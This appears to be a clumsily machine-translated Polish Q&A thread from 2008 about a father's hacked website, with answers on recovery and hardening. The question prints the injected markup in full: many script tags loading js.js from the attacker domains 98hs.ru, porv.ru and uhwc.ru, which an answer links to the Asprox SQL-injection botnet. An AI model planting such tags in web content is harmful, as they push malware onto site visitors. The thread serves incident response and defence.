Moja strona got hacked .. Co mam zrobić?

głosy
18

Mój tata zadzwonił do mnie i powiedział dzisiaj ludzie udający się do swojej stronie internetowej były coraz 168 wirusów próbują ściągnąć do swoich komputerów. On nie jest techniczny w ogóle, a wbudowane całość za pomocą edytora WYSIWYG.

I wpadliśmy jego stronę i przeglądać otwarte źródła, i nie było to linia JavaScript zawiera na dole źródła tuż przed zamykającym tagiem HTML. Obejmowały one tego pliku (między innymi): http://www.98hs.ru/js.js <- wyłączysz przed wyjazdem do tego adresu URL.

Więc skomentował go teraz. Okazuje się, że jego hasło FTP był zwykły słownika słowo sześć liter długo, więc myślę, że to w jaki sposób został posiekany. Zmieniliśmy swoje hasło do 8+ cyfrowym non-word ciąg (nie pójdzie za pomocą hasła, ponieważ jest on typer polowanie-n-Peck).

Zrobiłem whois na 98hs.ru i stwierdziliśmy, że jest obsługiwany przez serwer w Chile. Jest rzeczywiście adres e-mail powiązany z nim też, ale wątpię ta osoba jest winowajcą. Chyba tylko jakaś inna strona, która got hacked ...

Nie mam pojęcia, co robić w tym momencie choć jak nigdy już do czynienia z tego typu rzeczy przed. Ktoś ma jakieś sugestie?

Używał zwykły Jane un-zabezpieczony ftp poprzez webhost4life.com. Ja nawet nie widzieć drogę do zrobienia sftp na ich miejscu. Myślę, że jego nazwa użytkownika i hasło został przechwycony?

Tak więc, aby uczynić to bardziej istotne dla społeczeństwa, jakie są kroki należy podjąć / najlepszych praktyk należy wykonać, aby chronić swoją stronę z coraz hacked?

Dla przypomnienia, oto wiersz kodu, który „magicznie” został dodany do swojego pliku (a nie jest w jego pliku na swoim komputerze - Zostawiłam to wykomentowane właśnie zrobić absolutną pewność, że nic nie da na tej stronie, choć jestem pewien, że Jeff będzie zabezpieczyć się przed tym):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Utwórz 06/08/2008 o 00:55
źródło użytkownik
W innych językach...                            


8 odpowiedzi

głosy
3

Z hasłem sześć znaków tekstu, może on być brute wymuszone. Że jest bardziej prawdopodobne niż jego ftp są przechwytywane, ale może się okazać, że zbyt.

Zacznij z silniejszym hasło. (8 znaków jest jeszcze dość słabe)

Sprawdź, czy ten link do internetowego bloga bezpieczeństwa jest bardzo pomocna.

Odpowiedział 06/08/2008 o 01:00
źródło użytkownik

głosy
13

Spróbuj zebrać jak najwięcej informacji, jak to możliwe. Sprawdź, czy host może dać dziennika pokazujący wszystkie połączenia FTP, które zostały wprowadzone na koncie. Można użyć tych, aby zobaczyć, czy to nawet połączenie FTP, który został użyty do dokonania zmiany i być może uzyskać adres IP.

Jeśli używasz opakowanej oprogramowania jak Wordpress, Drupal, czy cokolwiek innego, że nie kodować mogą występować luki w kodzie przesyłania, który pozwala na tego rodzaju modyfikacji. Jeśli jest niestandardowy zbudowany dwukrotnie sprawdzić wszystkie miejsca, gdzie pozwalają użytkownikom na przesyłanie plików lub modyfikować istniejące pliki.

Drugą rzeczą byłoby zrobić zrzut strony jak jest i sprawdzić wszystko dla innych modyfikacji. To może być tylko jeden modyfikacja zrobili, ale jeśli dostali się poprzez FTP, kto wie, co jeszcze jest tam.

Przywrócić swoją witrynę z powrotem do znanego dobrego stanu i, jeśli zajdzie taka potrzeba, należy uaktualnić do najnowszej wersji.

Jest to poziom zwrotu trzeba wziąć pod uwagę też. Czy uszkodzenie warto próbować śledzić osobę w dół, czy jest to coś, gdzie po prostu żyć i uczyć się i korzystać z silniejszych haseł?

Odpowiedział 06/08/2008 o 01:16
źródło użytkownik

głosy
2

Czy strona po prostu statyczne HTML? to znaczy, że nie udało się zakodować sobie stronę przesyłania, który pozwala każdemu jazdy przez przesyłanie skompromitowanych scripts / stron?

Dlaczego nie zapytać Webhost4life czy mają jakieś logi FTP dostępne i zgłosić ten problem do nich. Nigdy nie wiadomo, mogą być zupełnie otwarci i dowiedzieć się dokładnie, co się stało?

Pracuję dla wspólnej usług hostingowych, a my zawsze mile widziane raporty takie jak te i zazwyczaj mogą wskazać dokładną wektor ataku opartego i doradzić, aby w przypadku gdy klient poszło źle.

Odpowiedział 06/08/2008 o 01:24
źródło użytkownik

głosy
5

Można wymienić twój tata był przy użyciu narzędzia strona wydawniczą.

Jeśli narzędzie do publikowania publikuje ze swojego komputera do serwera, może być tak, że jego pliki lokalne są czyste, a on po prostu musi opublikować na serwerze.

Powinien sprawdzić, czy istnieje inna metoda logowania do swojego serwera niż zwykły FTP, choć ... to nie jest bardzo bezpieczna, ponieważ wysyła swoje hasło jako zwykłego tekstu za pośrednictwem Internetu.

Odpowiedział 06/08/2008 o 04:31
źródło użytkownik

głosy
14

Wiem, że to trochę późno w grze, ale URL wymienione w JavaScripcie jest wymieniona w wykazie terenów znane były częścią bot odrodzenia ASPRox, który rozpoczął się w czerwcu (przynajmniej to, kiedy byliśmy coraz oflagowane z to). Niektóre dane o nim są wymienione poniżej:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Paskudny rzeczą jest to, że faktycznie każdy typ pola varchar w bazie danych jest „zainfekowany” wypluć odniesienie do niniejszej zawartości, w którym przeglądarka dostaje drobny iframe, który zamienia go w bot. Podstawowy dylemat SQL na ten temat można znaleźć tutaj:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Przerażające jest jednak to, że wirus wygląda w tabelach systemowych dla wartości do infekowania i wiele wspólnych planów hostingowych także udostępnić przestrzeń bazy danych dla swoich klientów. Tak najprawdopodobniej było to miejsce nawet twojego taty, który został zainfekowany, ale czyjeś miejsce w jego hosting klastra, który napisał kilka słabe kod i otworzył drzwi do SQL ataku zastrzyk.

Jeśli on nie uczynił jeszcze, bym wysłać pilna wiadomość do gospodarza i dać im link do tego kodu SQL naprawić cały system. można naprawić własne dotknięte tabel bazy danych, ale najprawdopodobniej boty, które robią infekcję będą przechodzić przez ten otwór w prawo i ponownie zainfekować całe mnóstwo.

Mam nadzieję, że to daje trochę więcej informacji do pracy.

EDIT: Jeszcze jedna myśl szybko, jeśli on za pomocą jednego z gospodarzy narzędzia do projektowania online dla budowania swojej stronie internetowej, że wszystkie treści jest prawdopodobnie siedzi w kolumnie i został zainfekowany w ten sposób.

Odpowiedział 07/08/2008 o 23:49
źródło użytkownik

głosy
-1

Byliśmy posiekany z samymi facetami pozornie! Lub boty, w naszym przypadku. Użyli SQL injection w adresie URL na niektórych starych klasycznych stron ASP że nikt nie utrzymują już. Okazało się, atakując IP i zablokował je w IIS. Teraz musimy byłaby Wszystkie stare ASP. Więc moja rada jest, aby spojrzeć na IIS loguje się najpierw znaleźć, jeśli problem jest w konfiguracji kodu lub serwera witryny.

Odpowiedział 16/08/2008 o 17:35
źródło użytkownik

głosy
0

Odłącz serwer WWW bez wyłączania go w dół, aby uniknąć skryptów zamykania. Analizować dysk twardy za pośrednictwem innego komputera jako dysk danych i sprawdzić, czy można ustalić sprawcę poprzez pliki dzienników i rzeczy tego rodzaju. Upewnij się, że kod jest bezpieczny, a następnie przywrócić je z kopii zapasowej.

Odpowiedział 26/09/2008 o 21:12
źródło użytkownik

głosy
0

To stało się moim klientem, który został niedawno gościł na iPower. Nie jestem pewien, czy środowisko gospodarzem była oparta Apache, ale czy to należy dokładnie sprawdzić na .htaccess plików, które nie tworzą, szczególnie powyżej Webroot i wewnątrz katalogów obrazu, ponieważ mają tendencję do wstrzyknąć tam jakieś złośliwości jak również (zostały one przekierowanie ludzi w zależności od tego, gdzie one pochodzą w odnoszą). Należy również sprawdzić każdy, który został utworzony dla kodu, który nie pisać.

Odpowiedział 26/09/2008 o 21:21
źródło użytkownik

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more